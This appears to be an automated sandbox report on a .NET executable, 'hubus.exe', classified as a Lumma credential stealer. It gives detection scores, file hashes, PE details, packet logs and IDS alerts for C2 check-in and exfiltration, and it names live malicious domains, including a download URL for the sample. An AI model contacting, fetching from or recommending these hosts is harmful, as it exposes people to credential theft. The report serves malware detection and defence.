| hubus.exe | 37% | ReversingLabs | | |
| hubus.exe | 100% | Avira | HEUR/AGEN.1323360 | |
| hubus.exe | 100% | Joe Sandbox ML | | |

No Antivirus matches

| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| www.google.com | 172.253.124.104 | true | false | | high |
| testyhurriedo.click | 104.21.112.1 | true | true | | unknown |
| klipcatepiu0.shop | unknown | unknown | false | | unknown |

| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| https://testyhurriedo.click/api | true | | unknown |
| grannyejh.lat | true | | unknown |
| https://www.google.com/sorry/index?continue=https://www.google.com/complete/search%3Fclient%3Dchrome-omni%26gs_ri%3Dchrome-ext-ansg%26xssi%3Dt%26q%3D%26oit%3D0%26oft%3D1%26pgcl%3D20%26gs_rn%3D42%26sugkey%3DAIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw&q=EgRmgZjNGKXmkrsGIjAb7Fn47Pfqq66K6PhdOlnUxTi9zJAMw9w-80fWZCRZxaXkInduKUM2DaaOHZpbOAUyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM | false | | high |
| https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgRmgZjNGKXmkrsGIjCkGpzj8-euKlDOVcJu_WqTG7Pj74bgPdYXXG0950A2yNMi702qgLvpvTQOXXmXdkwyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM | false | | high |
| https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw | false | | high |
| testyhurriedo.click | true | | unknown |
                                                                                                                                                                            unknown
                                                                                                                                                                            https://klipcatepiu0.shop/hubus.exe, 00000001.00000002.12270439971.0000000001601000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              unknown
                                                                                                                                                                              http://polymer.github.io/CONTRIBUTORS.txtchrome.exe, 00000002.00000003.12121625572.00002D240270C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12121993386.00002D2402804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12119832619.00002D24037B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12120319474.00002D2403844000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12121855837.00002D2403930000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12120050820.00002D2402740000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12119929342.00002D2403818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12121757415.00002D2402740000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                unknown
                                                                                                                                                                                https://www.talbots.com/cartchrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://google-ohttp-relay-query.fastly-edge.com/2Pchrome.exe, 00000002.00000003.12147098378.00002D20006CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12143230023.00002D2403AE8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2584082051607049&output=html&h=280&slotchrome.exe, 00000002.00000003.12142776492.00002D2403748000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12197109238.00002D24033AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12142816076.00002D2403404000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://testyhurriedo.click/3hubus.exe, 00000001.00000002.12272853744.0000000003FBF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        unknown
                                                                                                                                                                                        https://javadl.oracle.com/webapps/download/AutoDL?BundleId=245029_d3c52aa6bfa54d3ca74e617f18309292chrome.exe, 00000002.00000002.12196842993.00002D2403330000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12195822771.00002D2403198000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12196334480.00002D240328E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://www.bhphotovideo.com/find/cart.jspchrome.exe, 00000002.00000002.12192680209.00002D2402BAC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://www.autoitscript.com/cgi-bin/getfile.pl?autoit3/autoit-v3-setup.exechrome.exe, 00000002.00000002.12200633021.00002D2403A50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12198816161.00002D2403668000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12196476185.00002D24032CC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://www.vitalsource.com/cartchrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://issuetracker.google.com/292285899chrome.exe, 00000002.00000002.12196085557.00002D2403230000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12116420730.00002D2402C88000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  unknown
                                                                                                                                                                                                  https://testyhurriedo.click/Dhubus.exe, 00000001.00000002.12268716447.0000000001594000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    https://www.carid.com/cart.phpchrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://www.pokemoncenter.com/cartchrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        http://google.com/cchrome.exe, 00000002.00000002.12186475572.00002D2402279000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          https://lens.google.com/v3/uploadchrome.exe, 00000002.00000003.12121993386.00002D2402804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12121855837.00002D2403930000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12121757415.00002D2402740000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            https://recoveringlib.blogspot.com/chrome.exe, 00000002.00000002.12196085557.00002D2403230000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              https://stackoverflow.com/q/2152978/23354hubus.exe, 00000000.00000002.12088018857.0000000005A30000.00000004.08000000.00040000.00000000.sdmp, hubus.exe, 00000000.00000002.12084979136.0000000004021000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                https://anglebug.com/42265720chrome.exe, 00000002.00000002.12196028536.00002D2403204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12116420730.00002D2402C88000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                  http://anglebug.com/42264571chrome.exe, 00000002.00000002.12196028536.00002D2403204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12116420730.00002D2402C88000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                    https://lens.google.com/uploadchrome.exe, 00000002.00000003.12121993386.00002D2402804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12121855837.00002D2403930000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12121757415.00002D2402740000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      high
                                                                                                                                                                                                                      https://www.homedepot.com/mycart/homechrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        high
                                                                                                                                                                                                                        https://docs.google.com/document/?usp=installed_webappchrome.exe, 00000002.00000002.12198062457.00002D2403554000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12197687210.00002D24034B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12191417889.00002D2402A50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12114826026.00002D24023E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12188280827.00002D2402470000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          high
                                                                                                                                                                                                                          https://beastacademy.com/checkout/cartchrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            high
                                                                                                                                                                                                                            https://tr.snapchat.com/cm/i?pid=93f19646-2418-418d-98af-f244ebb7c1ccchrome.exe, 00000002.00000003.12147909365.00002D24038D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12191554369.00002D2402A70000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              high
                                                                                                                                                                                                                              https://googleads.g.doubleclick.net/pagead/drt/s?v=r20120211chrome.exe, 00000002.00000003.12142776492.00002D2403748000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12197109238.00002D24033AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12142816076.00002D2403404000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                https://www.belk.com/shopping-bag/chrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  high
                                                                                                                                                                                                                                  https://www.neimanmarcus.com/checkout/cart.jspchrome.exe, 00000002.00000002.12192680209.00002D2402BAC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    high
                                                                                                                                                                                                                                    https://storygize.netchrome.exe, 00000002.00000002.12196734725.00002D240331C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                      high
                                                                                                                                                                                                                                      https://www.youtube.com/:chrome.exe, 00000002.00000002.12191417889.00002D2402A50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12114826026.00002D24023E0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                        high
IP | Domain | Country | ASN | ASN Name | Malicious
104.21.112.1 | testyhurriedo.click | United States | 13335 | CLOUDFLARENETUS | true
239.255.255.250 | unknown | Reserved | unknown | unknown | false
172.253.124.104 | www.google.com | United States | 15169 | GOOGLEUS | false
                                                                                                                                                                                                                                        IP
                                                                                                                                                                                                                                        192.168.11.20
                                                                                                                                                                                                                                        127.0.0.1
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1578636
Start date and time: 2024-12-20 00:55:58 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 37s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Number of analysed new started processes analysed: 6
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: hubus.exe
(renamed file extension from dll to exe)
Original Sample Name: hubus.dll
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@17/0@4/5
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 92%
                                                                                                                                                                                                                                        • Number of executed functions: 213
                                                                                                                                                                                                                                        • Number of non-executed functions: 27
                                                                                                                                                                                                                                        • Exclude process from analysis (whitelisted): svchost.exe
                                                                                                                                                                                                                                        • Excluded IPs from analysis (whitelisted): 142.250.105.94, 172.253.124.138, 172.253.124.100, 172.253.124.101, 172.253.124.102, 172.253.124.139, 172.253.124.113, 108.177.122.84, 74.125.136.101, 74.125.136.139, 74.125.136.100, 74.125.136.138, 74.125.136.113, 74.125.136.102, 142.250.217.174, 172.217.215.139, 172.217.215.102, 172.217.215.100, 172.217.215.101, 172.217.215.113, 172.217.215.138, 108.177.122.139, 108.177.122.113, 108.177.122.101, 108.177.122.102, 108.177.122.138, 108.177.122.100, 142.250.217.238, 64.233.176.113, 64.233.176.102, 64.233.176.138, 64.233.176.139, 64.233.176.101, 64.233.176.100, 172.217.165.206, 23.47.204.53
                                                                                                                                                                                                                                        • Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, redirector.gvt1.com, ctldl.windowsupdate.com, clientservices.googleapis.com, clients.l.google.com
• Not all processes were analyzed, report is missing behavior information
                                                                                                                                                                                                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
18:58:24 | API Interceptor | 11x Sleep call for process: hubus.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
104.21.112.1 | SH8ZyOWNi2.exe | malicious | CMSBrute | beammp.com/phpmyadmin/
239.255.255.250 | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, Vidar |
 | 1734647107dd7eab79078510a75c9c904ec20f028e4e5eeaf98868f69fdfb304d2c24675ce436.dat-decoded.exe | malicious | XWorm |
 | 17346471071098118b26fa2e7fe54471af2f31e15cc65aad0de660d0190f83c19fa638201a790.dat-decoded.exe | malicious | Njrat |
 | 1734647107cb5feb29beac8e7c2a4d2b204afcea8969eb9f4b139cbe2e61d9316e36a22099229.dat-decoded.exe | malicious | AsyncRAT |
 | 1734647108c2d815e9b224b58a4453e937ebbee326356eaa9618758f1ee8f3e412a78fcc82730.dat-decoded.exe | malicious | AsyncRAT |
 | ghostspider.7z | malicious | Unknown |
 | https://www.canva.com/design/DAGZxEJMIA0/pFi0b1a1Y78oAGDuII8Hjg/view?utm_content=DAGZxEJMIA0&utm_campaign=designshare&utm_medium=link2&utm_source=uniquelinks&utlId=hdcdec8ed4a | malicious | HTMLPhisher |
 | https://gateway.lighthouse.storage/ipfs/bafkreigjxudfsi54f5pliswxztgujxgpdhe4uyrezdbg5avbtrclxrxc6i | malicious | HTMLPhisher |
 | https://mdgouv.com | malicious | HTMLPhisher |
 | https://kubota.highq.com/kubota/sitecontroller.action?metaData.siteID=7&metaData.parentFolderID=74 | malicious | Unknown |
                                                                                                                                                                                                                                                            No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, Vidar | 104.21.64.80
 | file.exe | malicious | NetSupport RAT, LummaC, Amadey, Blank Grabber, LummaC Stealer, PureLog Stealer | 104.21.23.76
 | https://www.canva.com/design/DAGZxEJMIA0/pFi0b1a1Y78oAGDuII8Hjg/view?utm_content=DAGZxEJMIA0&utm_campaign=designshare&utm_medium=link2&utm_source=uniquelinks&utlId=hdcdec8ed4a | malicious | HTMLPhisher | 172.67.74.152
 | https://gateway.lighthouse.storage/ipfs/bafkreigjxudfsi54f5pliswxztgujxgpdhe4uyrezdbg5avbtrclxrxc6i | malicious | HTMLPhisher | 104.18.10.207
 | billys.exe | malicious | Meduza Stealer | 172.67.74.152
 | ruppert.exe | malicious | CredGrabber, Meduza Stealer | 104.26.13.205
 | https://supercrete.lk/m/ms_doc.html | malicious | HTMLPhisher | 104.17.25.14
 | Employee_Letter.PDFuJPefyDW1j.url | malicious | Unknown | 172.67.134.25
 | file.exe | malicious | NetSupport RAT, LummaC, Amadey, LummaC Stealer | 104.26.0.231
Match | Associated Sample Name / URL | Detection | Threat Name | Context
a0e9f5d64349fb13191bc781f81f42e1 | file.exe | malicious | NetSupport RAT, LummaC, Amadey, LummaC Stealer | 104.21.112.1
 | file.exe | malicious | ScreenConnect Tool, LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar | 104.21.112.1
 | mirabon.msi | malicious | BruteRatel, Latrodectus | 104.21.112.1
 | Tii6ue74NB.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, Stealc, Vidar | 104.21.112.1
 | file.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS | 104.21.112.1
 | Svcrhpjadgyclc.cmd | malicious | DBatLoader | 104.21.112.1
 | file.exe | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Xmrig | 104.21.112.1
 | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, Vidar | 104.21.112.1
 | MFQbv2Yuzv.exe | malicious | LummaC, Stealc | 104.21.112.1
 | Y41xQGmT37.exe | malicious | LummaC, Stealc | 104.21.112.1
                                                                                                                                                                                                                                                            No context
                                                                                                                                                                                                                                                            No created / dropped files found
                                                                                                                                                                                                                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                            Entropy (8bit):7.787199781436822
                                                                                                                                                                                                                                                            TrID:
                                                                                                                                                                                                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                                                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                                                                                                                                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                                                                                                            • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                                                                                                                            File name:hubus.exe
                                                                                                                                                                                                                                                            File size:1'361'408 bytes
                                                                                                                                                                                                                                                            MD5:43f8e85b16887df9aee3d896bd1fd7e3
                                                                                                                                                                                                                                                            SHA1:f09fae91694982e2d5dafad61b1addf0aef0abd2
                                                                                                                                                                                                                                                            SHA256:8b1984efe2ed414eef8b8c8de34f03e3fdbccf0e4782dd8d1d958a7dbdef6e7d
                                                                                                                                                                                                                                                            SHA512:a4944734427e56c42751187468f11f634f7a9bc1b948e1f8e70972b972b3c1dd6f119ef88454fb1b61d69d6500fcf5d246894eb7deaaf6484eca5b2ee43445be
                                                                                                                                                                                                                                                            SSDEEP:24576:1e4dRQpbOCHEZkjcJbzYEwiqDvR0D2zrsWf8zLWLwCc8s2BXW3tSqBkJNkXt:HQJOCHjjcFzYEwiqDaqHKLAwCcVwJwSI
                                                                                                                                                                                                                                                            TLSH:6A55F177FA8B4D21D28C1B3AE0878905B3B0598A721BF30E788523D619437FBD59A5D3
                                                                                                                                                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....dg................................. ........@.. ....................... ............`................................
                                                                                                                                                                                                                                                            Icon Hash:90cececece8e8eb0
                                                                                                                                                                                                                                                            Entrypoint:0x54dace
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp: 0x676407CF [Thu Dec 19 11:47:27 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al

Name                                Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT        0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT        0x14da80         0x4b          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE      0x14e000         0x578         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION     0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY      0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC     0x150000         0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG         0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT     0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR     0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS           0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG   0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT  0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT           0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT  0x0              0x0
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x14bad4 | 0x14bc00 | 52dc09eb66fa1cf12d005696677789d8 | False | 0.8793632547569706 | data | 7.791442134557085 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x14e000 | 0x578 | 0x600 | 9143e3a0c1a5f09d3b0d4d1e6186385a | False | 0.4147135416666667 | data | 3.9890831097574466 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x150000 | 0xc | 0x200 | d6317c53578daa34b7eb47b3aac2f7f4 | False | 0.044921875 | data | 0.09800417566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0x14e0a0 | 0x2ec | data | | | 0.4411764705882353
RT_MANIFEST | 0x14e38c | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-20T00:58:24.104291+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.11.20 | 49744 | 104.21.112.1 | 443 | TCP
2024-12-20T00:58:24.759785+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.11.20 | 49744 | 104.21.112.1 | 443 | TCP
2024-12-20T00:58:24.759785+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.11.20 | 49744 | 104.21.112.1 | 443 | TCP
2024-12-20T00:58:25.047908+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.11.20 | 49745 | 104.21.112.1 | 443 | TCP
2024-12-20T00:58:25.772976+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.11.20 | 49745 | 104.21.112.1 | 443 | TCP
2024-12-20T00:58:25.772976+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.11.20 | 49745 | 104.21.112.1 | 443 | TCP
2024-12-20T00:58:34.058030+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.11.20 | 49760 | 104.21.112.1 | 443 | TCP
2024-12-20T00:58:35.185431+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.11.20 | 49761 | 104.21.112.1 | 443 | TCP
2024-12-20T00:58:36.342508+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.11.20 | 49762 | 104.21.112.1 | 443 | TCP
2024-12-20T00:58:37.318729+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.11.20 | 49763 | 104.21.112.1 | 443 | TCP
2024-12-20T00:58:38.278410+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.11.20 | 49764 | 104.21.112.1 | 443 | TCP
2024-12-20T00:58:38.815041+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.11.20 | 49764 | 104.21.112.1 | 443 | TCP
2024-12-20T00:58:39.539585+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.11.20 | 49765 | 104.21.112.1 | 443 | TCP
2024-12-20T00:58:42.379010+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.11.20 | 49766 | 104.21.112.1 | 443 | TCP
2024-12-20T00:58:42.933024+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.11.20 | 49766 | 104.21.112.1 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:28.730283022 CET44349750172.253.124.104192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:28.794766903 CET49751443192.168.11.20172.253.124.104
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:28.794780970 CET44349751172.253.124.104192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:28.794918060 CET49751443192.168.11.20172.253.124.104
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:28.795228004 CET49751443192.168.11.20172.253.124.104
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:28.795233011 CET44349751172.253.124.104192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:28.831619978 CET49752443192.168.11.20172.253.124.104
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:28.831634045 CET44349752172.253.124.104192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:28.831897020 CET49752443192.168.11.20172.253.124.104
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:28.832252979 CET49752443192.168.11.20172.253.124.104
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:28.832262993 CET44349752172.253.124.104192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:28.855798960 CET44349749172.253.124.104192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:28.856280088 CET49749443192.168.11.20172.253.124.104
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:28.856290102 CET44349749172.253.124.104192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:28.857012987 CET44349749172.253.124.104192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:28.857275009 CET49749443192.168.11.20172.253.124.104
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:28.858067036 CET49749443192.168.11.20172.253.124.104
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:28.858134031 CET44349749172.253.124.104192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:28.858175993 CET49749443192.168.11.20172.253.124.104
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:28.902205944 CET44349749172.253.124.104192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:28.909429073 CET49749443192.168.11.20172.253.124.104
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:28.909440994 CET44349749172.253.124.104192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:28.956295013 CET49749443192.168.11.20172.253.124.104
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:29.217241049 CET44349750172.253.124.104192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:29.217627048 CET49750443192.168.11.20172.253.124.104
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:29.217636108 CET44349750172.253.124.104192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:29.218472004 CET44349750172.253.124.104192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:29.218739986 CET49750443192.168.11.20172.253.124.104
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:29.218976021 CET49750443192.168.11.20172.253.124.104
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:29.219048023 CET49750443192.168.11.20172.253.124.104
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:29.219053030 CET44349750172.253.124.104192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:29.262207031 CET44349750172.253.124.104192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:29.268986940 CET49750443192.168.11.20172.253.124.104
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:29.268991947 CET44349750172.253.124.104192.168.11.20
